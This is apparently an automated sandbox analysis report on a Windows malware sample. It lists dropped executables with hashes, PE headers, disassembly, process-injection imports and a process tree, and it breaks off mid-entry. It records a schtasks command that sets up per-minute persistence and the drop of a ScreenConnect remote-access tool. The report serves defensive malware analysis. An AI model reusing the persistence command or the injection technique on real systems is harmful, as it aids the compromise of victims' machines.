                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\SgJvWIOT\k0mHyoU4\FomDFzEQ\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\Soso0bnK\laHUjL9Z\wIjJoUTg\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\d3d9.dll

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe
                                                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):665088
                                                                                                                                                                                          Entropy (8bit):6.5328361267936055
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:ZaHgJLlHUmYnuOZ1WuFv4cHSdzZU8QZgWhKrUrTAeT5CbdiAAxDCDb2+W:ZaHCXYnukUzZU8bWhjIKqFAxDCf2+
                                                                                                                                                                                          MD5:103C525AA49B81407E72A346BAA3EC19
                                                                                                                                                                                          SHA1:1AE74F6EF71B929472D28D064FC0C17D0FC54D1C
                                                                                                                                                                                          SHA-256:0593EEF89F1BDE96F5D469281DE905717E9B38A70D9B374C9C3193FCB740A22D
                                                                                                                                                                                          SHA-512:4FB74F42FCE676B37208B75CE378F4B91772F4C088A7C3C8D120F92C67D337DAD99E21F26DA5ADAFF0A2566158EC33DE35E8341415A1F6A729D5840CEE69EF8B
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......C.)...GQ..GQ..GQL.DP..GQL.BP..GQL.CP..GQL.FP..GQ z<Q..GQ..FQe.GQ.=BP..GQ.=CP..GQ.=DP..GQ..GQ..GQj=GP..GQj=EP..GQRich..GQ........................PE..L......f...........!...&.,...................@...............................P............@.........................@...x.......<............................0..8...`...................................@............@..P............................text...S*.......,.................. ..`.rdata..Vh...@...j...0..............@..@.data...\y.......p..................@....reloc..8....0......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1180160
                                                                                                                                                                                          Entropy (8bit):7.703603560955088
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:24576:KmUPjztESBDhakdbtl7vq6bknwKTaA9Cpr2r:KmUPv+eldbtl7i6FKeFpy
                                                                                                                                                                                          MD5:18BBC3FB86E902AFB59C06811A5B01F4
                                                                                                                                                                                          SHA1:E9EA82EA8199BCB882B933A90707D7CA71F25899
                                                                                                                                                                                          SHA-256:FA480B199885433840ABE9D506CCF32FC75FC1DD771695CCE2DCB4F438A98D00
                                                                                                                                                                                          SHA-512:FC62B3CD4067F2CD11AF16B2F1130DC21135B5E23100CB5ACAF2C235B9C1DB128110E5BB4BF38FC438666649E4C865524B9ECF67695FBD080AA3D349D627BC5C
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*..y..y..y..+y..yvZ.x..yvZ.x..yvZ.x..ys..x..y..y..y..y..yGY.x..yRich..y........PE..d....P.f.........."....'.....z......0..........@.............................@............`.................................................|...h................,...........0.......v..T....................x..(....t..@...............h............................text... ........................... ..`.rdata..X2.......4..................@..@.data...............................@....pdata...,..........................@..@_RDATA....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\Users\user\AppData\Roaming\zRu1BqA0\k45TZ53Y\Caz9ZOq9\sys_updater.exe

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):710144
                                                                                                                                                                                          Entropy (8bit):7.502820216844358
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:7vOG/HYZOL1n2mCbSPs9pQtKft96EuQFSaUdKGJY7NxO:7vOG/HYZOLrPsHQUuEpULWTO
                                                                                                                                                                                          MD5:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          SHA1:430E9FDBE7A8414E1FAB7DC61522C74708699361
                                                                                                                                                                                          SHA-256:AABD22FA9354E0C79521ECD0F8E870F908FF5AFD39E603B9820C9676176F626F
                                                                                                                                                                                          SHA-512:1C2BCF02C4AD10A57895974EA8589541EF868A5BBEC37EC4B7D9936F716C82C1CA958AC74538298C89A661B1639F1EEA12C7C1B13D4B0E7988AB8E51D9CE401D
                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................d....wc.....wc.....wc.....r...................F`.....Rich....................PE..L....].f.........."....'.D...................`....@.......................................@.................................\...h................................%.....T...................@.......(...@............`...............................text....C.......D.................. ..`.rdata..De...`...f...H..............@..@.data...d...........................@....reloc...%.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          Static File Info

                                                                                                                                                                                          General

                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                          Entropy (8bit):6.635102478988021
                                                                                                                                                                                          TrID:
                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                          File name:RPHbzz3JqY.exe
                                                                                                                                                                                          File size:331'776 bytes
                                                                                                                                                                                          MD5:848abdbd09c052799a0e0180b59f6fee
                                                                                                                                                                                          SHA1:2f73b04baf17c3a9f9d21f6f324d64306a10682c
                                                                                                                                                                                          SHA256:1aa0622a744ec4d28a561bac60ec5e907476587efbadfde546d2b145be4b8109
                                                                                                                                                                                          SHA512:eb3a87e787d151915da06f89132d6e5b9b7682a3a69761795180050f42c7fbe8831049ee96410e7b7de5e7c835ceff1e24e84321cccf8d6ed9ba5928bca58203
                                                                                                                                                                                          SSDEEP:6144:/DiElZeVJ9/+pPQHe5wocklXck9UBd4MvQhdaAadaH8CaTnlmIa+w4Iqr6KGus24:/DiETMgqkKBJm5+fnHYftcv7vQG6zIs
                                                                                                                                                                                          TLSH:65648D21BA41C031DAB114705B38BBF6992DEE344F6416F7A3D4097BAE702D2A735B63
                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k...k...k.......k......hk.......k.......k.......k.......k.......k.......k...k..|k.......k.......k..Rich.k.................

                                                                                                                                                                                          File Icon

                                                                                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                          General

                                                                                                                                                                                          Entrypoint:0x420eeb
                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                          Time Stamp:0x66A003BF [Tue Jul 23 19:25:51 2024 UTC]
                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                          OS Version Minor:0
                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                          File Version Minor:0
                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                                                          Import Hash:89d186e701948ed4026afa52bc6342f0

                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                          Instruction
                                                                                                                                                                                          call 00007EFD315B788Ch
                                                                                                                                                                                          jmp 00007EFD315B7279h
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                          push esi
                                                                                                                                                                                          mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                          add ecx, eax
                                                                                                                                                                                          movzx eax, word ptr [ecx+14h]
                                                                                                                                                                                          lea edx, dword ptr [ecx+18h]
                                                                                                                                                                                          add edx, eax
                                                                                                                                                                                          movzx eax, word ptr [ecx+06h]
                                                                                                                                                                                          imul esi, eax, 28h
                                                                                                                                                                                          add esi, edx
                                                                                                                                                                                          cmp edx, esi
                                                                                                                                                                                          je 00007EFD315B741Bh
                                                                                                                                                                                          mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                                          cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                                          jc 00007EFD315B740Ch
                                                                                                                                                                                          mov eax, dword ptr [edx+08h]
                                                                                                                                                                                          add eax, dword ptr [edx+0Ch]
                                                                                                                                                                                          cmp ecx, eax
                                                                                                                                                                                          jc 00007EFD315B740Eh
                                                                                                                                                                                          add edx, 28h
                                                                                                                                                                                          cmp edx, esi
                                                                                                                                                                                          jne 00007EFD315B73ECh
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          ret
                                                                                                                                                                                          mov eax, edx
                                                                                                                                                                                          jmp 00007EFD315B73FBh
                                                                                                                                                                                          push esi
                                                                                                                                                                                          call 00007EFD315B7B6Bh
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          je 00007EFD315B7422h
                                                                                                                                                                                          mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                          mov esi, 004507C4h
                                                                                                                                                                                          mov edx, dword ptr [eax+04h]
                                                                                                                                                                                          jmp 00007EFD315B7406h
                                                                                                                                                                                          cmp edx, eax
                                                                                                                                                                                          je 00007EFD315B7412h
                                                                                                                                                                                          xor eax, eax
                                                                                                                                                                                          mov ecx, edx
                                                                                                                                                                                          lock cmpxchg dword ptr [esi], ecx
                                                                                                                                                                                          test eax, eax
                                                                                                                                                                                          jne 00007EFD315B73F2h
                                                                                                                                                                                          xor al, al
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          ret
                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                          pop esi
                                                                                                                                                                                          ret
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          cmp dword ptr [ebp+08h], 00000000h
                                                                                                                                                                                          jne 00007EFD315B7409h
                                                                                                                                                                                          mov byte ptr [004507C8h], 00000001h
                                                                                                                                                                                          call 00007EFD315B6F58h
                                                                                                                                                                                          call 00007EFD315B9D3Eh
                                                                                                                                                                                          test al, al
                                                                                                                                                                                          jne 00007EFD315B7406h
                                                                                                                                                                                          xor al, al
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          ret
                                                                                                                                                                                          call 00007EFD315C2190h
                                                                                                                                                                                          test al, al
                                                                                                                                                                                          jne 00007EFD315B740Ch
                                                                                                                                                                                          push 00000000h
                                                                                                                                                                                          call 00007EFD315B9D45h
                                                                                                                                                                                          pop ecx
                                                                                                                                                                                          jmp 00007EFD315B73EBh
                                                                                                                                                                                          mov al, 01h
                                                                                                                                                                                          pop ebp
                                                                                                                                                                                          ret
                                                                                                                                                                                          push ebp
                                                                                                                                                                                          mov ebp, esp
                                                                                                                                                                                          cmp byte ptr [004507C9h], 00000000h
                                                                                                                                                                                          je 00007EFD315B7406h
                                                                                                                                                                                          mov al, 01h

                                                                                                                                                                                          Data Directories

                                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x4d7f40x8c.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x520000x2a80.reloc
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x4b36c0x38.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3a80x40.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x3e0000x200.rdata
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                          Sections

                                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                          .text0x10000x3c66b0x3c8004270448ae10fba783e5f096512347d79False0.495456159607438data6.648481461161736IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .rdata0x3e0000x1035c0x10400688e27bdfc917ed709a959ab4c181f34False0.500811298076923OpenPGP Public Key5.5432050003934075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                          .data0x4f0000x22c40x1400163b751420a675ebe3796556975866b5False0.1919921875data3.372075073835572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                          .reloc0x520000x2a800x2c00716b2ec73a0ea49608ead9bb91adb350False0.7561257102272727data6.548561404726861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                          Imports

                                                                                                                                                                                          DLLImport
                                                                                                                                                                                          KERNEL32.dllReadProcessMemory, WriteProcessMemory, GetModuleHandleA, GetProcAddress, GetEnvironmentVariableA, CreateDirectoryA, WaitForSingleObject, CreateMutexA, Sleep, GetModuleFileNameA, VirtualProtectEx, CreateProcessW, GetVersion, GetComputerNameA, WriteConsoleW, HeapSize, CreateFileW, GetProcessHeap, SetStdHandle, VirtualAllocEx, VirtualAlloc, SetThreadContext, GetThreadContext, CreateProcessA, ResumeThread, K32GetModuleFileNameExA, GetLastError, K32EnumProcesses, OpenProcess, TerminateProcess, GetCurrentProcessId, CopyFileA, CloseHandle, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, FindClose, HeapReAlloc, ReadConsoleW, SetFilePointerEx, GetFileSizeEx, ReadFile, GetConsoleMode, GetConsoleOutputCP, FlushFileBuffers, GetFileType, GetCurrentThreadId, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, CompareStringEx, GetCPInfo, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetStringTypeW, IsProcessorFeaturePresent, InitializeSListHead, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, GetCurrentProcess, RaiseException, RtlUnwind, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitProcess, GetModuleHandleExW, CreateThread, ExitThread, FreeLibraryAndExitThread, GetStdHandle, WriteFile, GetModuleFileNameW, GetCommandLineA, GetCommandLineW, HeapFree, HeapAlloc, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, SetEndOfFile
                                                                                                                                                                                          ADVAPI32.dllRegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCloseKey, GetUserNameA
                                                                                                                                                                                          SHELL32.dllShellExecuteA
                                                                                                                                                                                          ole32.dllCoInitializeEx, CoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoUninitialize
                                                                                                                                                                                          OLEAUT32.dllSysAllocString, SysFreeString, VariantInit, VariantClear
                                                                                                                                                                                          WININET.dllInternetReadFile, InternetOpenW, InternetOpenUrlA, InternetCloseHandle

                                                                                                                                                                                          Network Behavior

                                                                                                                                                                                          Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:03:26:23
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\Desktop\RPHbzz3JqY.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\RPHbzz3JqY.exe"
                                                                                                                                                                                          Imagebase:0x5d0000
                                                                                                                                                                                          File size:331'776 bytes
                                                                                                                                                                                          MD5 hash:848ABDBD09C052799A0E0180B59F6FEE
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                          Start time:03:26:23
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                                                                                                                                                                                          Imagebase:0x350000
                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                          Start time:03:26:24
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                          Start time:03:26:24
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:331'776 bytes
                                                                                                                                                                                          MD5 hash:848ABDBD09C052799A0E0180B59F6FEE
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                          • Detection: 100%, Avira
                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                          Start time:03:26:25
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:331'776 bytes
                                                                                                                                                                                          MD5 hash:848ABDBD09C052799A0E0180B59F6FEE
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                          Start time:03:26:25
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN explert.exe /TR "C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe" /F
                                                                                                                                                                                          Imagebase:0x350000
                                                                                                                                                                                          File size:187'904 bytes
                                                                                                                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                          Start time:03:26:26
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                          Start time:03:26:32
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\23495762359867\explert.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:331'776 bytes
                                                                                                                                                                                          MD5 hash:848ABDBD09C052799A0E0180B59F6FEE
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                          Start time:03:26:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe"
                                                                                                                                                                                          Imagebase:0xf20000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1765448808.0000000000F36000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe, Author: Joe Security
                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:03:26:35
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
                                                                                                                                                                                          Imagebase:0x7ff7b6560000
